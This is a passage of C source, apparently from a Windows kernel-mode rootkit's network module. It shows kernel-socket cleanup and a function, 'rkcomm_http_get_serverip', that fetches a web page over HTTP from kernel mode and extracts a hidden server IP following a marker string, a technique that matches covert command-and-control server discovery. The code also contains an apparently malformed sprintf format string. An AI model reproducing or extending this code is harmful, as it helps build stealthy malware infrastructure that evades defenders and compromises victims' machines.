		KSocketsClose(sock);
	}

	/// free mem
	if (request)
#ifdef _KERNELMODE
		ExFreePool (request);
#else
		free (request);
#endif // #ifdef _KERNELMODE
	return (int)Status;
}

#ifdef _KERNELMODE
/*
*	returns ip if it can be resolved by resolver (windows kernelmode only)
*
*/
int rkcomm_http_get_serverip (IN unsigned long ip, IN unsigned short port, IN char* resolverhostname, IN char* resolverpath, IN char* resolverquery, IN char* resolverresponse, OUT unsigned long* resolvedip)
{
	NTSTATUS Status = STATUS_UNSUCCESSFUL;
	ULARGE_INTEGER now = {0};
	char boundarytag [64] = {0};
	unsigned char* request = NULL;
	unsigned long reqsize = 0;
	unsigned char* response = NULL;
	unsigned long responsesize = 0;
	ksocket* sock = NULL;
	char* p = NULL;
	unsigned long newip = 0;

	// check params
	if (!ip || !port || !resolverhostname || !resolverpath || !resolverquery || !resolverresponse || !resolvedip)
		return -1;
	*resolvedip = 0;

	/// build boundary tag
	KeQuerySystemTime ((PLARGE_INTEGER)&now);
	ExSystemTimeToLocalTime ((PLARGE_INTEGER)&now,(PLARGE_INTEGER)&now);
	sprintf (boundarytag,"--%08x%08_%08x%08x",now.HighPart,now.LowPart,now.LowPart,now.HighPart);

	// build get request
	Status = rkcomm_http_build_getreq(resolverhostname, resolverpath, resolverquery, &request, &reqsize);
	if (!NT_SUCCESS (Status))
		goto __exit;

	/// create and connect socket
	Status = KSocketsCreate (&sock);
	if (!NT_SUCCESS(Status))
		goto __exit;
	Status = KSocketsConnect(sock,ip,port);
	if (!NT_SUCCESS(Status))
	{	
		Status = TRX_ERROR;
		goto __exit;
	}

	/// send request
	Status = rkcomm_send(sock,request,reqsize);
	if (!NT_SUCCESS (Status))
		goto __exit;

	/// get response
	Status = rkcomm_http_get_response(sock,&response,&responsesize);
	if (!NT_SUCCESS (Status))
		goto __exit;
	if (!responsesize || !response)
	{
		Status = STATUS_UNSUCCESSFUL;
		goto __exit;
	}

	/// check response
	p = find_buffer_in_buffer(response,resolverresponse,responsesize,strlen(resolverresponse),FALSE);
	if (!p)
	{
		Status = STATUS_UNSUCCESSFUL;
		goto __exit;
	}

	// get ip
	p+=strlen(resolverresponse);
	str_terminateonchar(p,'<');
	newip = Kinet_addr(p);
	DBG_OUT (("krcomm_http_get_serverip : query %s returned ip %s (%x)\n",resolverquery,p,newip));
	*resolvedip = newip;

	// ok
	Status = STATUS_SUCCESS;

__exit:
	if (!NT_SUCCESS (Status))
	{
		DBG_OUT (("krcomm_http_get_serverip : query %s returned error\n",resolverquery));
		Status = -1;
	}

	/// free mem
	if (request)
		ExFreePool (request);
	if (response)
		ExFreePool (response);
	if (sock)
	{
		KSocketsDisconnect(sock);
		KSocketsClose(sock);
	}
	return (int)Status;
}

/*
*	initialization stuff for http routines (kernelmode only)
*
*/
void rkcomm_http_initialize ()
{
	ExInitializePagedLookasideList(&ls_trxhttp_small,NULL,NULL,0,COMM_MEM_SMALL_SIZE + 1,'hstx',0);
}

/*
*	finalization stuff for http routines (kernelmode only)
*
*/
void rkcomm_http_finalize ()
{
	ExDeletePagedLookasideList(&ls_trxhttp_small);
}

#endif // #ifdef _KERNELMODE
